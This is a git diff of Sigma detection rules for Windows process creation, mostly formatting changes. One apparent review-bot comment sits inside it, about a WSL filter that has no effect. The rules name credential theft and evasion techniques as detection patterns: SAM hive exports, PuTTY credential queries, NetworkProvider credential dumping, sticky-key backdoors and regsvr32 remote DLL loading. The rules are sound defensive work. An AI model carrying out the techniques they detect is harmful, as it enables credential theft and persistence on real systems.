@@ -44,10 +41,10 @@ detection: - SubmitSamplesConsent - TamperProtection selection_dword_1: - CommandLine|contains|all: + CommandLine|contains|all: - ' add ' - d 1 - CommandLine|contains: + CommandLine|contains: - DisableAntiSpyware - DisableAntiSpywareRealtimeProtection - DisableAntiVirus diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_write_protect_for_storage_disabled.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_write_protect_for_storage_disabled.yml index f3c7fb734..e20d2f5d1 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_reg_write_protect_for_storage_disabled.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_reg_write_protect_for_storage_disabled.yml @@ -1,9 +1,7 @@ title: Write Protect For Storage Disabled id: 75f7a0e2-7154-4c4d-9eae-5cdb4e0a5c13 status: test -description: Looks for changes to registry to disable any write-protect property for - storage devices. This could be a precursor to a ransomware attack and has been - an observed technique used by cypherpunk group. +description: Looks for changes to registry to disable any write-protect property for storage devices. This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group. author: Sreeman date: 2021/06/11 modified: 2023/12/15 @@ -19,11 +17,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - \System\CurrentControlSet\Control - Write Protection - '0' - CommandLine|contains: + CommandLine|contains: - storage - storagedevicepolicies condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_regasm_regsvcs_uncommon_extension_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_regasm_regsvcs_uncommon_extension_execution.yml index d87658c1d..f94696750 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_regasm_regsvcs_uncommon_extension_execution.yml 
+++ b/sigma/sysmon/process_creation/proc_creation_win_regasm_regsvcs_uncommon_extension_execution.yml @@ -1,11 +1,10 @@ title: Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension id: e9f8f8cc-07cc-4e81-b724-f387db9175e4 related: - - id: cc368ed0-2411-45dc-a222-510ace303cb2 - type: derived + - id: cc368ed0-2411-45dc-a222-510ace303cb2 + type: derived status: test -description: Detects potentially suspicious execution of the Regasm/Regsvcs utilities - with an uncommon extension. +description: Detects potentially suspicious execution of the Regasm/Regsvcs utilities with an uncommon extension. references: - https://www.fortiguard.com/threat-signal-report/4718?s=09 - https://lolbas-project.github.io/lolbas/Binaries/Regasm/ @@ -24,14 +23,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \Regsvcs.exe - - \Regasm.exe - - OriginalFileName: - - RegSvcs.exe - - RegAsm.exe + - Image|endswith: + - \Regsvcs.exe + - \Regasm.exe + - OriginalFileName: + - RegSvcs.exe + - RegAsm.exe selection_extension: - CommandLine|contains: + CommandLine|contains: + # Note: Add more potentially uncommon extensions - .dat - .gif - .jpeg diff --git a/sigma/sysmon/process_creation/proc_creation_win_regasm_regsvcs_uncommon_location_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_regasm_regsvcs_uncommon_location_execution.yml index b963b20c0..afd78afe6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_regasm_regsvcs_uncommon_location_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_regasm_regsvcs_uncommon_location_execution.yml 
@@ -1,11 +1,10 @@ title: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location id: cc368ed0-2411-45dc-a222-510ace303cb2 related: - - id: e9f8f8cc-07cc-4e81-b724-f387db9175e4 - type: derived + - id: e9f8f8cc-07cc-4e81-b724-f387db9175e4 + type: derived status: test -description: Detects potentially suspicious execution of the Regasm/Regsvcs utilities - from a potentially suspicious location +description: Detects potentially suspicious execution of the Regasm/Regsvcs utilities from a potentially suspicious location references: - https://www.fortiguard.com/threat-signal-report/4718?s=09 - https://lolbas-project.github.io/lolbas/Binaries/Regasm/ @@ -25,19 +24,22 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \Regsvcs.exe - - \Regasm.exe - - OriginalFileName: - - RegSvcs.exe - - RegAsm.exe + - Image|endswith: + - \Regsvcs.exe + - \Regasm.exe + - OriginalFileName: + - RegSvcs.exe + - RegAsm.exe selection_dir: - CommandLine|contains: + CommandLine|contains: + # Note: Add more potentially suspicious directories - \AppData\Local\Temp\ - \Microsoft\Windows\Start Menu\Programs\Startup\ - \PerfLogs\ - \Users\Public\ - \Windows\Temp\ + # - '\Desktop\' + # - '\Downloads\' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_regedit_export_critical_keys.yml b/sigma/sysmon/process_creation/proc_creation_win_regedit_export_critical_keys.yml index bdedc72a8..f52c2c3bd 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_regedit_export_critical_keys.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_regedit_export_critical_keys.yml 
@@ -1,8 +1,8 @@ title: Exports Critical Registry Keys To a File id: 82880171-b475-4201-b811-e9c826cd5eaa related: - - id: f0e53e89-8d22-46ea-9db5-9d4796ee2f8a - type: similar + - id: f0e53e89-8d22-46ea-9db5-9d4796ee2f8a + type: similar status: test description: Detects the export of a crital Registry key to a file. references: @@ -23,18 +23,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \regedit.exe - - OriginalFileName: REGEDIT.EXE + - Image|endswith: \regedit.exe + - OriginalFileName: REGEDIT.EXE selection_cli_1: - CommandLine|contains: + CommandLine|contains: - ' /E ' - ' -E ' selection_cli_2: - CommandLine|contains: + CommandLine|contains: - hklm - hkey_local_machine selection_cli_3: - CommandLine|endswith: + CommandLine|endswith: - \system - \sam - \security diff --git a/sigma/sysmon/process_creation/proc_creation_win_regedit_export_keys.yml b/sigma/sysmon/process_creation/proc_creation_win_regedit_export_keys.yml index b85564fd9..b6000a7f2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_regedit_export_keys.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_regedit_export_keys.yml @@ -1,8 +1,8 @@ title: Exports Registry Key To a File id: f0e53e89-8d22-46ea-9db5-9d4796ee2f8a related: - - id: 82880171-b475-4201-b811-e9c826cd5eaa - type: similar + - id: 82880171-b475-4201-b811-e9c826cd5eaa + type: similar status: test description: Detects the export of the target Registry key to a file. references: 
@@ -23,18 +23,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \regedit.exe - - OriginalFileName: REGEDIT.EXE + - Image|endswith: \regedit.exe + - OriginalFileName: REGEDIT.EXE selection_cli: - CommandLine|contains: + CommandLine|contains: - ' /E ' - ' -E ' - filter_1: - CommandLine|contains: + filter_1: # filters to avoid intersection with critical keys rule + CommandLine|contains: - hklm - hkey_local_machine filter_2: - CommandLine|endswith: + CommandLine|endswith: - \system - \sam - \security diff --git a/sigma/sysmon/process_creation/proc_creation_win_regedit_import_keys.yml b/sigma/sysmon/process_creation/proc_creation_win_regedit_import_keys.yml index 24c13c16d..b4e267ec3 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_regedit_import_keys.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_regedit_import_keys.yml @@ -1,8 +1,8 @@ title: Imports Registry Key From a File id: 73bba97f-a82d-42ce-b315-9182e76c57b1 related: - - id: 0b80ade5-6997-4b1d-99a1-71701778ea61 - type: similar + - id: 0b80ade5-6997-4b1d-99a1-71701778ea61 + type: similar status: test description: Detects the import of the specified file to the registry with regedit.exe. references: @@ -23,15 +23,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \regedit.exe - - OriginalFileName: REGEDIT.EXE + - Image|endswith: \regedit.exe + - OriginalFileName: REGEDIT.EXE selection_cli: - CommandLine|contains: + CommandLine|contains: - ' /i ' - ' /s ' - .reg filter_1: - CommandLine|contains: + CommandLine|contains: - ' /e ' - ' /a ' - ' /c ' @@ -39,7 +39,7 @@ detection: - ' -a ' - ' -c ' filter_2: - CommandLine|re: :[^ \\] + CommandLine|re: :[^ \\] # to avoid intersection with ADS rule condition: process_creation and (all of selection_* and not all of filter_*) fields: - ParentImage 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_regedit_import_keys_ads.yml b/sigma/sysmon/process_creation/proc_creation_win_regedit_import_keys_ads.yml index 3b5543090..e4b24e0bb 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_regedit_import_keys_ads.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_regedit_import_keys_ads.yml @@ -1,8 +1,8 @@ title: Imports Registry Key From an ADS id: 0b80ade5-6997-4b1d-99a1-71701778ea61 related: - - id: 73bba97f-a82d-42ce-b315-9182e76c57b1 - type: similar + - id: 73bba97f-a82d-42ce-b315-9182e76c57b1 + type: similar status: test description: Detects the import of a alternate datastream to the registry with regedit.exe. references: @@ -23,15 +23,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \regedit.exe - - OriginalFileName: REGEDIT.EXE + - Image|endswith: \regedit.exe + - OriginalFileName: REGEDIT.EXE selection_cli: - CommandLine|contains: + CommandLine|contains: - ' /i ' - .reg - CommandLine|re: :[^ \\] + CommandLine|re: :[^ \\] filter: - CommandLine|contains: + CommandLine|contains: - ' /e ' - ' /a ' - ' /c ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_regini_ads.yml b/sigma/sysmon/process_creation/proc_creation_win_regini_ads.yml index ba641aac6..f9e1fbdf9 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_regini_ads.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_regini_ads.yml 
@@ -1,11 +1,10 @@ title: Suspicious Registry Modification From ADS Via Regini.EXE id: 77946e79-97f1-45a2-84b4-f37b5c0d8682 related: - - id: 5f60740a-f57b-4e76-82a1-15b6ff2cb134 - type: derived + - id: 5f60740a-f57b-4e76-82a1-15b6ff2cb134 + type: derived status: test -description: Detects the import of an alternate data stream with regini.exe, regini.exe - can be used to modify registry keys. +description: Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys. references: - https://lolbas-project.github.io/lolbas/Binaries/Regini/ - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f @@ -25,10 +24,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \regini.exe - - OriginalFileName: REGINI.EXE + - Image|endswith: \regini.exe + - OriginalFileName: REGINI.EXE selection_re: - CommandLine|re: :[^ \\] + CommandLine|re: :[^ \\] condition: process_creation and (all of selection_*) fields: - ParentImage diff --git a/sigma/sysmon/process_creation/proc_creation_win_regini_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_regini_execution.yml index b4dbde0b8..5f8be186f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_regini_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_regini_execution.yml 
@@ -1,11 +1,10 @@ title: Registry Modification Via Regini.EXE id: 5f60740a-f57b-4e76-82a1-15b6ff2cb134 related: - - id: 77946e79-97f1-45a2-84b4-f37b5c0d8682 - type: derived + - id: 77946e79-97f1-45a2-84b4-f37b5c0d8682 + type: derived status: test -description: Detects the execution of regini.exe which can be used to modify registry - keys, the changes are imported from one or more text files. +description: Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files. references: - https://lolbas-project.github.io/lolbas/Binaries/Regini/ - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f @@ -25,10 +24,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \regini.exe - - OriginalFileName: REGINI.EXE + - Image|endswith: \regini.exe + - OriginalFileName: REGINI.EXE filter: - CommandLine|re: :[^ \\] + CommandLine|re: :[^ \\] # Covered in 77946e79-97f1-45a2-84b4-f37b5c0d8682 condition: process_creation and (selection and not filter) fields: - ParentImage diff --git a/sigma/sysmon/process_creation/proc_creation_win_registry_cimprovider_dll_load.yml b/sigma/sysmon/process_creation/proc_creation_win_registry_cimprovider_dll_load.yml index ad4087f5b..9b5afeecd 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_registry_cimprovider_dll_load.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_registry_cimprovider_dll_load.yml @@ -21,7 +21,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \register-cimprovider.exe - CommandLine|contains|all: + CommandLine|contains|all: - -path - dll condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_registry_enumeration_for_credentials_cli.yml b/sigma/sysmon/process_creation/proc_creation_win_registry_enumeration_for_credentials_cli.yml index 9b08af355..38e31b606 100644 
--- a/sigma/sysmon/process_creation/proc_creation_win_registry_enumeration_for_credentials_cli.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_registry_enumeration_for_credentials_cli.yml @@ -1,11 +1,10 @@ title: Enumeration for 3rd Party Creds From CLI id: 87a476dc-0079-4583-a985-dee7a20a03de related: - - id: e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1 - type: derived + - id: e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1 + type: derived status: test -description: Detects processes that query known 3rd party registry keys that holds - credentials via commandline +description: Detects processes that query known 3rd party registry keys that holds credentials via commandline references: - https://isc.sans.edu/diary/More+Data+Exfiltration/25698 - https://github.com/synacktiv/Radmin3-Password-Cracker/blob/acfc87393e4b7c06353973a14a6c7126a51f36ac/regkey.txt @@ -25,7 +24,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: # Add more paths as they are discovered - \Software\SimonTatham\PuTTY\Sessions - \Software\\SimonTatham\PuTTY\SshHostKeys\ - \Software\Mobatek\MobaXterm\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_registry_ie_security_zone_protocol_defaults_downgrade.yml b/sigma/sysmon/process_creation/proc_creation_win_registry_ie_security_zone_protocol_defaults_downgrade.yml index fc2e72ff4..af8d2f2d4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_registry_ie_security_zone_protocol_defaults_downgrade.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_registry_ie_security_zone_protocol_defaults_downgrade.yml 
@@ -1,15 +1,11 @@ title: IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI id: 10344bb3-7f65-46c2-b915-2d00d47be5b0 related: - - id: 3fd4c8d7-8362-4557-a8e6-83b29cc0d724 - type: similar + - id: 3fd4c8d7-8362-4557-a8e6-83b29cc0d724 + type: similar status: experimental -description: 'Detects changes to Internet Explorer''s (IE / Windows Internet properties) - ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My - Computer" zone. This allows downloaded files from the Internet to be granted the - same level of trust as files stored locally. - - ' +description: | + Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally. references: - https://twitter.com/M_haggis/status/1699056847154725107 - https://twitter.com/JAMESWT_MHT/status/1699042827261391247 @@ -29,7 +25,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - \Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults - http - ' 0' diff --git a/sigma/sysmon/process_creation/proc_creation_win_registry_install_reg_debugger_backdoor.yml b/sigma/sysmon/process_creation/proc_creation_win_registry_install_reg_debugger_backdoor.yml index 514f27d03..8d5064e8d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_registry_install_reg_debugger_backdoor.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_registry_install_reg_debugger_backdoor.yml 
@@ -1,8 +1,7 @@ title: Suspicious Debugger Registration Cmdline id: ae215552-081e-44c7-805f-be16f975c8a2 status: test -description: Detects the registration of a debugger for a program that is available - in the logon screen (sticky key backdoor). +description: Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor). references: - https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/ - https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/ @@ -22,9 +21,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection1: - CommandLine|contains: \CurrentVersion\Image File Execution Options\ + CommandLine|contains: \CurrentVersion\Image File Execution Options\ selection2: - CommandLine|contains: + CommandLine|contains: - sethc.exe - utilman.exe - osk.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_registry_logon_script.yml b/sigma/sysmon/process_creation/proc_creation_win_registry_logon_script.yml index fb421422f..33ae8b360 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_registry_logon_script.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_registry_logon_script.yml @@ -1,11 +1,10 @@ title: Potential Persistence Via Logon Scripts - CommandLine id: 21d856f9-9281-4ded-9377-51a1a6e2a432 related: - - id: 0a98a10c-685d-4ab0-bddc-b6bdd1d48458 - type: derived + - id: 0a98a10c-685d-4ab0-bddc-b6bdd1d48458 + type: derived status: experimental -description: Detects the addition of a new LogonScript to the registry value "UserInitMprLogonScript" - for potential persistence +description: Detects the addition of a new LogonScript to the registry value "UserInitMprLogonScript" for potential persistence references: - https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html author: Tom Ueltschi (@c_APT_ure) 
@@ -23,10 +22,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: UserInitMprLogonScript + CommandLine|contains: UserInitMprLogonScript condition: process_creation and selection falsepositives: - - Legitimate addition of Logon Scripts via the command line by administrators - or third party tools + - Legitimate addition of Logon Scripts via the command line by administrators or third party tools level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_registry_new_network_provider.yml b/sigma/sysmon/process_creation/proc_creation_win_registry_new_network_provider.yml index be7c45cbd..be0d45566 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_registry_new_network_provider.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_registry_new_network_provider.yml @@ -1,11 +1,10 @@ title: Potential Credential Dumping Attempt Using New NetworkProvider - CLI id: baef1ec6-2ca9-47a3-97cc-4cf2bda10b77 related: - - id: 0442defa-b4a2-41c9-ae2c-ea7042fc4701 - type: similar + - id: 0442defa-b4a2-41c9-ae2c-ea7042fc4701 + type: similar status: test -description: Detects when an attacker tries to add a new network provider in order - to dump clear text credentials, similar to how the NPPSpy tool does it +description: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it references: - https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade - https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy 
@@ -24,9 +23,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - \System\CurrentControlSet\Services\ - \NetworkProvider + # filter: + # CommandLine|contains: + # - '\System\CurrentControlSet\Services\WebClient\NetworkProvider' + # - '\System\CurrentControlSet\Services\LanmanWorkstation\NetworkProvider' + # - '\System\CurrentControlSet\Services\RDPNP\NetworkProvider' + # - '\System\CurrentControlSet\Services\P9NP\NetworkProvider' # Related to WSL remove the comment if you use WSL in your ENV condition: process_creation and selection falsepositives: - Other legitimate network providers used and not filtred in this rule diff --git a/sigma/sysmon/process_creation/proc_creation_win_registry_privilege_escalation_via_service_key.yml b/sigma/sysmon/process_creation/proc_creation_win_registry_privilege_escalation_via_service_key.yml index 6e445044f..aa8884f32 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_registry_privilege_escalation_via_service_key.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_registry_privilege_escalation_via_service_key.yml @@ -1,8 +1,7 @@ title: Potential Privilege Escalation via Service Permissions Weakness id: 0f9c21f1-6a73-4b0e-9809-cb562cb8d981 status: test -description: Detect modification of services configuration (ImagePath, FailureCommand - and ServiceDLL) in registry by processes with Medium integrity level +description: Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level references: - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment - https://pentestlab.blog/2017/03/31/insecure-registry-permissions/ 
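Review bot: The commented-out `filter` block added under `selection` in proc_creation_win_registry_new_network_provider.yml is inert, and its guidance comment (`remove the comment if you use WSL in your ENV`) leaves out that the unchanged `condition: process_creation and selection` also has to reference the new selection for it to have any effect. An operator who only uncomments the `filter:` lines gets no behavioural change and keeps receiving the P9NP/WSL hits the comment is meant to suppress. Suggest extending the comment on the `# filter:` line to read `# filter: # to enable, uncomment this block AND change the condition to 'process_creation and (selection and not filter)'`. The quoted `'\System\...'` values in the commented block also differ in style from the unquoted `\System\CurrentControlSet\Services\` list items directly above; if the block is ever enabled it would be worth matching the surrounding form.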
@@ -22,10 +21,10 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: IntegrityLevel: Medium - CommandLine|contains|all: + CommandLine|contains|all: - ControlSet - services - CommandLine|contains: + CommandLine|contains: - \ImagePath - \FailureCommand - \ServiceDll diff --git a/sigma/sysmon/process_creation/proc_creation_win_registry_provlaunch_provisioning_command.yml b/sigma/sysmon/process_creation/proc_creation_win_registry_provlaunch_provisioning_command.yml index 5ef84ef2e..e5863f764 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_registry_provlaunch_provisioning_command.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_registry_provlaunch_provisioning_command.yml @@ -1,15 +1,14 @@ title: Potential Provisioning Registry Key Abuse For Binary Proxy Execution id: 2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25 related: - - id: 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c - type: similar - - id: f9999590-1f94-4a34-a91e-951e47bedefd - type: similar - - id: 7021255e-5db3-4946-a8b9-0ba7a4644a69 - type: similar + - id: 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c # CLI Generic + type: similar + - id: f9999590-1f94-4a34-a91e-951e47bedefd # CLI Abuse + type: similar + - id: 7021255e-5db3-4946-a8b9-0ba7a4644a69 # Registry + type: similar status: experimental -description: Detects potential abuse of the provisioning registry key for indirect - command execution through "Provlaunch.exe". +description: Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe". references: - https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/ - https://twitter.com/0gtweet/status/1674399582162153472 @@ -27,7 +26,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: SOFTWARE\Microsoft\Provisioning\Commands\ + CommandLine|contains: SOFTWARE\Microsoft\Provisioning\Commands\ condition: process_creation and selection falsepositives: - Unknown 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_registry_set_unsecure_powershell_policy.yml b/sigma/sysmon/process_creation/proc_creation_win_registry_set_unsecure_powershell_policy.yml index 6e216dd55..e60727b09 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_registry_set_unsecure_powershell_policy.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_registry_set_unsecure_powershell_policy.yml @@ -1,15 +1,14 @@ title: Potential PowerShell Execution Policy Tampering - ProcCreation id: cf2e938e-9a3e-4fe8-a347-411642b28a9f related: - - id: fad91067-08c5-4d1a-8d8c-d96a21b37814 - type: similar - - id: 87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180 - type: similar - - id: 61d0475c-173f-4844-86f7-f3eebae1c66b - type: similar + - id: fad91067-08c5-4d1a-8d8c-d96a21b37814 # ProcCreation Registry + type: similar + - id: 87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180 # ProcCreation Cmdlet + type: similar + - id: 61d0475c-173f-4844-86f7-f3eebae1c66b # PowerShell ScriptBlock + type: similar status: test -description: Detects changes to the PowerShell execution policy registry key in order - to bypass signing requirements for script execution from the CommandLine +description: Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine references: - https://learn.microsoft.com/de-de/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.3 author: Nasreddine Bencherchali (Nextron Systems) @@ -25,11 +24,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_path: - CommandLine|contains: + CommandLine|contains: - \ShellIds\Microsoft.PowerShell\ExecutionPolicy - \Policies\Microsoft\Windows\PowerShell\ExecutionPolicy selection_values: - CommandLine|contains: + CommandLine|contains: - Bypass - RemoteSigned - Unrestricted 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_registry_typed_paths_persistence.yml b/sigma/sysmon/process_creation/proc_creation_win_registry_typed_paths_persistence.yml index b42464774..530086e8a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_registry_typed_paths_persistence.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_registry_typed_paths_persistence.yml @@ -1,8 +1,7 @@ title: Persistence Via TypedPaths - CommandLine id: ec88289a-7e1a-4cc3-8d18-bd1f60e4b9ba status: test -description: Detects modification addition to the 'TypedPaths' key in the user or - admin registry via the commandline. Which might indicate persistence attempt +description: Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. Which might indicate persistence attempt references: - https://twitter.com/dez_/status/1560101453150257154 - https://forensafe.com/blogs/typedpaths.html @@ -19,7 +18,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: \Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths + CommandLine|contains: \Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml b/sigma/sysmon/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml index d6a53761c..1071177e6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml 
@@ -1,8 +1,7 @@
title: Potential Regsvr32 Commandline Flag Anomaly
id: b236190c-1c61-41e9-84b3-3fe03f6d76b0
status: test
-description: Detects a potential command line flag anomaly related to "regsvr32" in
- which the "/i" flag is used without the "/n" which should be uncommon.
+description: Detects a potential command line flag anomaly related to "regsvr32" in which the "/i" flag is used without the "/n" which should be uncommon.
references:
- https://twitter.com/sbousseaden/status/1282441816986484737?s=12
author: Florian Roth (Nextron Systems)
@@ -21,11 +20,11 @@ detection:
Channel: Microsoft-Windows-Sysmon/Operational
selection:
Image|endswith: \regsvr32.exe
- CommandLine|contains:
+ CommandLine|contains:
- ' /i:'
- ' -i:'
filter_main_flag:
- CommandLine|contains:
+ CommandLine|contains:
- ' /n '
- ' -n '
condition: process_creation and (selection and not 1 of filter_main_*)
diff --git a/sigma/sysmon/process_creation/proc_creation_win_regsvr32_http_ip_pattern.yml b/sigma/sysmon/process_creation/proc_creation_win_regsvr32_http_ip_pattern.yml
index bdd0fadd5..a8f5ba1be 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_regsvr32_http_ip_pattern.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_regsvr32_http_ip_pattern.yml
@@ -1,8 +1,7 @@
title: Potentially Suspicious Regsvr32 HTTP IP Pattern
id: 2dd2c217-bf68-437a-b57c-fe9fd01d5de8
status: experimental
-description: Detects regsvr32 execution to download and install DLLs located remotely
- where the address is an IP address.
+description: Detects regsvr32 execution to download and install DLLs located remotely where the address is an IP address.
references:
- https://twitter.com/mrd0x/status/1461041276514623491
- https://twitter.com/tccontre18/status/1480950986650832903
@@ -22,10 +21,10 @@ detection:
EventID: 1
Channel: Microsoft-Windows-Sysmon/Operational
selection_img:
- - Image|endswith: \regsvr32.exe
- - OriginalFileName: REGSVR32.EXE
+ - Image|endswith: \regsvr32.exe
+ - OriginalFileName: REGSVR32.EXE
selection_ip:
- CommandLine|contains:
+ CommandLine|contains:
- ' /i:http://1'
- ' /i:http://2'
- ' /i:http://3'
diff --git a/sigma/sysmon/process_creation/proc_creation_win_regsvr32_network_pattern.yml b/sigma/sysmon/process_creation/proc_creation_win_regsvr32_network_pattern.yml
index 89bc26c70..e13c9a312 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_regsvr32_network_pattern.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_regsvr32_network_pattern.yml
@@ -1,11 +1,10 @@
title: Potentially Suspicious Regsvr32 HTTP/FTP Pattern
id: 867356ee-9352-41c9-a8f2-1be690d78216
related:
- - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d
- type: obsoletes
+ - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d
+ type: obsoletes
status: experimental
-description: Detects regsvr32 execution to download/install/register new DLLs that
- are hosted on Web or FTP servers.
+description: Detects regsvr32 execution to download/install/register new DLLs that are hosted on Web or FTP servers.
references:
- https://twitter.com/mrd0x/status/1461041276514623491
- https://twitter.com/tccontre18/status/1480950986650832903
@@ -25,14 +24,14 @@ detection:
EventID: 1
Channel: Microsoft-Windows-Sysmon/Operational
selection_img:
- - Image|endswith: \regsvr32.exe
- - OriginalFileName: REGSVR32.EXE
+ - Image|endswith: \regsvr32.exe
+ - OriginalFileName: REGSVR32.EXE
selection_flag:
- CommandLine|contains:
+ CommandLine|contains:
- ' /i'
- ' -i'
selection_protocol:
- CommandLine|contains:
+ CommandLine|contains:
- ftp
- http
condition: process_creation and (all of selection_*)
